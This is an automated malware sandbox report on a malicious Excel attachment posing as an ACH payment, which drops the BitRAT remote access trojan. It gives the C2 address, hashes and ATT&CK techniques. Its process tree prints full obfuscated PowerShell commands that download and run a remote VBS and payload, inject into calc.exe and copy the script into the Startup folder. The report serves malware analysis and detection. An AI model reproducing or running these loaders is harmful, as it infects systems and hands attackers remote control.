Analysis

  • max time kernel
    122s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    24-08-2022 18:31

General

  • Target

    ach payment 082422.xls

  • Size

    29KB

  • MD5

    70c9d8b73d8b0b704ca4eed431f0b8b9

  • SHA1

    700df606142d4d599078112277f6352134a5376b

  • SHA256

    33a03e5a48aa54e8ade7fa89d977a846b517956ee17a0419c68698742104450b

  • SHA512

    b682cf9edfac472dfec29d8bad297b436321eb16c6dd3bbd3c77d660fabdf5089296657a02e1d74fb960f8784cf87bb1d924778806ae75bf484324dbb719bbed

  • SSDEEP

    768:vgk3hOdsylKlgxopeiBNhZFGzE+cL2kdAJRB5kPok:Yk3hOdsylKlgxopeiBNhZFGzE+cL2kdv

Score
10/10

Malware Config

Extracted

Family

bitrat

Version

1.38

C2

bitm.dvrlists.com:6061

Attributes
  • communication_password

    cef08aa1523518b499f65898132b7512

  • tor_process

    tor

Signatures

  • BitRAT

    BitRAT is a remote access tool written in C++ and uses leaked source code from other families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • UPX packed file 9 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Office loads VBA resources, possible macro or embedded object present
  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 63 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 25 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\ach payment 082422.xls"
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1764
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.sldnur\''+pmet:vne$,''sbv.tneilC/clac/nomwen/moc.ehgityennikcm//:ptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX(([regex]::Matches($TC,'.','RightToLeft') | ForEach {$_.value}) -join '');start-process($env:temp+ '\rundls.vbs')
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1612
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\rundls.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:396
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,00101001,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,00100111,00100000,00101011,00100000,00100111,01101100,01101111,01100001,01100100,00100111,00100000,00101011,00100000,00100111,01010011,01110100,01110010,00100111,00100000,00101011,00100000,00100111,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00100111,00100000,00101011,00100000,00100111,00111010,00101111,00101111,01101101,01100011,01101011,01101001,01101110,01101110,01100101,01111001,01110100,01101001,01100111,01101000,01100101,00101110,01100011,01101111,01101101,00101111,01101110,01100101,01110111,01101101,01101111,01101110,00101111,01000101,01101110,01100011,01110010,01111001,01110000,01110100,01100101,01100100,00100000,01000011,01101100,01101001,01100101,01101110,01110100,00100000,01001111,01000111,00101110,01101010,01110000,01100111,00100111,00101001,01111100,01010000) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };$o00='ZE000'.replace('Z','I').replace('000','x');sal P $o00;([system.String]::Join('', $gf))|P
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1368
          • C:\WINDOWS\syswow64\calc.exe
            "C:\WINDOWS\syswow64\calc.exe"
            5⤵
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:952
            • C:\WINDOWS\syswow64\cmd.exe
              cmd /c ""C:\Users\Admin\AppData\Local\Temp\3w8CQVmo.bat" "
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:524
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 5 /nobreak
                7⤵
                • Delays execution with timeout.exe
                PID:1172
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-item 'C:\Users\Admin\AppData\Local\Temp\rundls.vbs' -Destination 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rundls.vbs'
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2012
  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2016
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2016 CREDAT:275457 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:1896

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

System Information Discovery

2
T1082

Query Registry

1
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\3w8CQVmo.bat
    Filesize

    270B

    MD5

    67ce3c43a5ce8bcb6a0240d48191b244

    SHA1

    126170999871a152c3a7c884f72f8ede19ee089b

    SHA256

    6c5887c56f0aa7cdceaee58694f94df1549152aa0bf4c00dcf94f564fbcea5ae

    SHA512

    f8004b7a85d64996979d9140ca7dfc5af8705b44a7f4430c93243d86cd289adf85625325cc348311415a299364689de954741a3f49d0fc4ce97e607b2f7546d6

  • C:\Users\Admin\AppData\Local\Temp\rundls.vbs
    Filesize

    2KB

    MD5

    bce33b78d45f9f86c00d35f0cbdeaa7c

    SHA1

    89f52ab70ec72cca1f69a8b6139fc3b7181d667c

    SHA256

    32202bd660c1cbe597504f6108e09c74de842917aaf3ae88446712ec9be78209

    SHA512

    fdd7af18ec9c94fe5708e8b277ade1036778e692e807649818cab6f5f585f73ff4cc616636f30c579956f5de11bd46290eeda77384d696478898b8c93528ae32

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    c5bb834c84d368235a013149dcf5177a

    SHA1

    7aadb88c4954827d780b4f86924c52328600a868

    SHA256

    41161af23d741243242aa695fb48ad9e10de517687c5773f9b5e9561025216a1

    SHA512

    aa69b110d830a6b5368a1e0c46f5bc79ab8a1935dcd77ab9fac6c8c38256f1484b179b4a3cedf39fbaea992ce5872639d9c2b0fe842f1aff94211bc074f7cb87

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    c5bb834c84d368235a013149dcf5177a

    SHA1

    7aadb88c4954827d780b4f86924c52328600a868

    SHA256

    41161af23d741243242aa695fb48ad9e10de517687c5773f9b5e9561025216a1

    SHA512

    aa69b110d830a6b5368a1e0c46f5bc79ab8a1935dcd77ab9fac6c8c38256f1484b179b4a3cedf39fbaea992ce5872639d9c2b0fe842f1aff94211bc074f7cb87

  • \Users\Admin\AppData\Local\Temp\28712958-7029-4eed-8e2f-deb7c107988f\AgileDotNetRT.dll
    Filesize

    94KB

    MD5

    14ff402962ad21b78ae0b4c43cd1f194

    SHA1

    f8a510eb26666e875a5bdd1cadad40602763ad72

    SHA256

    fb9646cb956945bdc503e69645f6b5316d3826b780d3c36738d6b944e884d15b

    SHA512

    daa7a08bf3709119a944bce28f6ebdd24e54a22b18cd9f86a87873e958df121a3881dcdd5e162f6b4e543238c7aef20f657c9830df01d4c79290f7c9a4fcc54b

  • memory/396-82-0x0000000000000000-mapping.dmp
  • memory/524-117-0x0000000000000000-mapping.dmp
  • memory/952-100-0x0000000000400000-0x00000000007E4000-memory.dmp
    Filesize

    3.9MB

  • memory/952-97-0x0000000000400000-0x00000000007E4000-memory.dmp
    Filesize

    3.9MB

  • memory/952-110-0x0000000000100000-0x000000000010A000-memory.dmp
    Filesize

    40KB

  • memory/952-108-0x0000000000400000-0x00000000007E4000-memory.dmp
    Filesize

    3.9MB

  • memory/952-106-0x0000000000400000-0x00000000007E4000-memory.dmp
    Filesize

    3.9MB

  • memory/952-119-0x0000000000400000-0x00000000007E4000-memory.dmp
    Filesize

    3.9MB

  • memory/952-105-0x0000000000400000-0x00000000007E4000-memory.dmp
    Filesize

    3.9MB

  • memory/952-104-0x0000000000400000-0x00000000007E4000-memory.dmp
    Filesize

    3.9MB

  • memory/952-101-0x0000000000400000-0x00000000007E4000-memory.dmp
    Filesize

    3.9MB

  • memory/952-103-0x00000000007E2730-mapping.dmp
  • memory/952-114-0x0000000000100000-0x000000000010A000-memory.dmp
    Filesize

    40KB

  • memory/952-112-0x0000000000400000-0x00000000007E4000-memory.dmp
    Filesize

    3.9MB

  • memory/952-98-0x0000000000400000-0x00000000007E4000-memory.dmp
    Filesize

    3.9MB

  • memory/952-111-0x0000000000100000-0x000000000010A000-memory.dmp
    Filesize

    40KB

  • memory/952-113-0x0000000000100000-0x000000000010A000-memory.dmp
    Filesize

    40KB

  • memory/1172-120-0x0000000000000000-mapping.dmp
  • memory/1368-94-0x000000006BBC0000-0x000000006C16B000-memory.dmp
    Filesize

    5.7MB

  • memory/1368-102-0x00000000023D8000-0x00000000023E9000-memory.dmp
    Filesize

    68KB

  • memory/1368-107-0x000000006BBC0000-0x000000006C16B000-memory.dmp
    Filesize

    5.7MB

  • memory/1368-86-0x0000000000000000-mapping.dmp
  • memory/1612-84-0x000000006BE70000-0x000000006C41B000-memory.dmp
    Filesize

    5.7MB

  • memory/1612-79-0x0000000000000000-mapping.dmp
  • memory/1612-81-0x000000006BE70000-0x000000006C41B000-memory.dmp
    Filesize

    5.7MB

  • memory/1764-68-0x00000000006FC000-0x0000000000700000-memory.dmp
    Filesize

    16KB

  • memory/1764-77-0x00000000006FC000-0x0000000000700000-memory.dmp
    Filesize

    16KB

  • memory/1764-67-0x00000000006FC000-0x0000000000700000-memory.dmp
    Filesize

    16KB

  • memory/1764-78-0x00000000006FC000-0x0000000000700000-memory.dmp
    Filesize

    16KB

  • memory/1764-54-0x000000002F3C1000-0x000000002F3C4000-memory.dmp
    Filesize

    12KB

  • memory/1764-93-0x00000000724FD000-0x0000000072508000-memory.dmp
    Filesize

    44KB

  • memory/1764-75-0x00000000006FC000-0x0000000000700000-memory.dmp
    Filesize

    16KB

  • memory/1764-76-0x00000000006FC000-0x0000000000700000-memory.dmp
    Filesize

    16KB

  • memory/1764-72-0x00000000006FC000-0x0000000000700000-memory.dmp
    Filesize

    16KB

  • memory/1764-73-0x00000000006FC000-0x0000000000700000-memory.dmp
    Filesize

    16KB

  • memory/1764-74-0x00000000006FC000-0x0000000000700000-memory.dmp
    Filesize

    16KB

  • memory/1764-71-0x00000000006FC000-0x0000000000700000-memory.dmp
    Filesize

    16KB

  • memory/1764-70-0x00000000006FC000-0x0000000000700000-memory.dmp
    Filesize

    16KB

  • memory/1764-69-0x00000000006FC000-0x0000000000700000-memory.dmp
    Filesize

    16KB

  • memory/1764-55-0x0000000071511000-0x0000000071513000-memory.dmp
    Filesize

    8KB

  • memory/1764-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/1764-63-0x00000000006FC000-0x0000000000700000-memory.dmp
    Filesize

    16KB

  • memory/1764-64-0x00000000006FC000-0x0000000000700000-memory.dmp
    Filesize

    16KB

  • memory/1764-65-0x00000000006FC000-0x0000000000700000-memory.dmp
    Filesize

    16KB

  • memory/1764-66-0x00000000006FC000-0x0000000000700000-memory.dmp
    Filesize

    16KB

  • memory/1764-62-0x00000000006FC000-0x0000000000700000-memory.dmp
    Filesize

    16KB

  • memory/1764-61-0x00000000006FC000-0x0000000000700000-memory.dmp
    Filesize

    16KB

  • memory/1764-60-0x00000000006FC000-0x0000000000700000-memory.dmp
    Filesize

    16KB

  • memory/1764-59-0x00000000006FC000-0x0000000000700000-memory.dmp
    Filesize

    16KB

  • memory/1764-115-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/1764-116-0x00000000724FD000-0x0000000072508000-memory.dmp
    Filesize

    44KB

  • memory/1764-58-0x00000000724FD000-0x0000000072508000-memory.dmp
    Filesize

    44KB

  • memory/1764-57-0x0000000075AF1000-0x0000000075AF3000-memory.dmp
    Filesize

    8KB

  • memory/2012-87-0x0000000000000000-mapping.dmp
  • memory/2012-92-0x000000006BBC0000-0x000000006C16B000-memory.dmp
    Filesize

    5.7MB